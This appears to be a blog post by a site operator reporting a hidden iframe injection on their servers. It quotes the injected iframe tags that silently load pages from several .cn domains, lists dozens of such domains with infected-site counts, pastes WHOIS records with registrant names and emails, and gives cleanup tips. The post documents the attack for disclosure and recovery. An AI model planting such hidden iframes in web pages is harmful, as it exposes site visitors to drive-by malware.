globalnameshop.cn iframe injection

some of server is affected by the hidden iframe injection. using iframe injection the contents of a web page can be altered (add / edit / deleted) in Line of Code.

 

i’ve found this code immediately after the opening of the body tag–

1. <iframe src=”http://hugetoplocate.cn:8080/index.php” width=153 height=198 style=”visibility: hidden”></iframe>

 

2. <iframe src=”http://globalnameshop.cn:8080/index.php” width=129 height=112 style=”visibility: hidden”></iframe>

 

3. <iframe src=”http://compoundcapitolgroup.cn:8080/ts/in.cgi?pepsi47″ width=125 height=125 style=”visibility: hidden”></iframe>

 

and some otheres like-

 

The biggest hint was the names of the two IFRAMEs which were located on the site:

 

http://dotcomnameshop.cn/in.cgi?income25

and

http://namesupermart.cn/in.cgi?income20

 

i got the who-is information is-

 

Domain Name: namesupermart.cn

ROID: 20081007s10001s46287853-cn

Domain Status: clientTransferProhibited

Registrant Organization: Scott Bell 

Registrant Name: Scott Bell

Administrative Email: scottkbell@missiongossip.com

Sponsoring Registrar: 广东时代互联科技有限公司

Name Server:ns1.freednshostserver.com

Name Server:ns2.freednshostserver.com

Registration Date: 2008-10-07 04:47

Expiration Date: 2009-10-07 04:47

 

Domain Name: thelotbet.cn

ROID: 20081108s10001s82360691-cn

Domain Status: clientTransferProhibited

Registrant Organization: Raymond Keaton 

Registrant Name: Raymond Keaton

Administrative Email: keaton@cybernauttech.com

Name Server:ns1.freednshostway.com

Name Server:ns2.freednshostway.com

Registration Date: 2008-11-08 16:13

Expiration Date: 2009-11-08 16:13

 

Many of the domains were registered to Raymond Keaton or Scott Bell above, or also to Michelle Rea rea@cybernauttech.com.

 

Here’s the results of infected domain-

 

IFRAME Domain Infected Domain Count

coolnameshop.cn 935

cutlot.cn 1549

denverfilmdigitalmedia.cn 601

diettopseek.cn 477

dotcomnameshop.cn 399

filmlifemediaguide.cn 0

filmlifemusicsite.cn 38

filmtypemedia.cn 0

findbigname.cn 452

findbigurls.cn 371

homenameregistration.cn 542

hotslotpot.cn 860

internetnamestore.cn 956

liteautotop.cn 965

litecarfinestsite.cn 2324

litecartop.cn 3889

litedownloadseek.cn 805

litegreatestdirect.cn 2664

litepremiumlist.cn 0

litetopfindworld.cn 1375

litetoplocatesite.cn 202

lotante.cn 1699

lotbetworld.cn 741

lotmachinesguide.cn 3654

lotultimatebet.cn 546

mainnameshop.cn 459

mediahomenamemartvideo.cn 240

mediahousenameshopfilm.cn 265

mixante.cn 1050

nameashop.cn 645

namebuyline.cn 310

namebuypicture.cn 2692

namestorefilmlife.cn 351

namesupermart.cn 424

nanotopfind.cn 14

nonfatautobest.cn 271

nonfatcarbest.cn 744

perfectnamestore.cn 662

playbetwager.cn 383

promixgroup.cn 823

superbetfair.cn 3967

superlitecarbest.cn 677

thelotbet.cn 415

yourfilmmovie.cn 0

yourliteseek.cn 59

 

Recover:

Here are a few tips that might help you:

1. The first thing is to change the passwords of your FTP, Database, and Control panel. Or remove all saved password from your ftp client.

2. File permissions in your server to the secure mode. (Ex: Any anonymous, Internet User access to be restricted). You need to contact your hosting company for this task.

3. Please download your files (web) from the server and check for infections. Clean the infected files. (Please contact your programmer/developer’s for this task)

4. Scan and clean your PCs/Workstation that you use for logging into your Web hosting server.

5. Please avoid using public/shared computers to access your server.

 

All of my server password i was saved in my cute ftp.

And all of my server attacked with this.

 

I have uploaded all of my index file again using filezilla.

So far it is ok.

 

Please give me if you have additional information about this–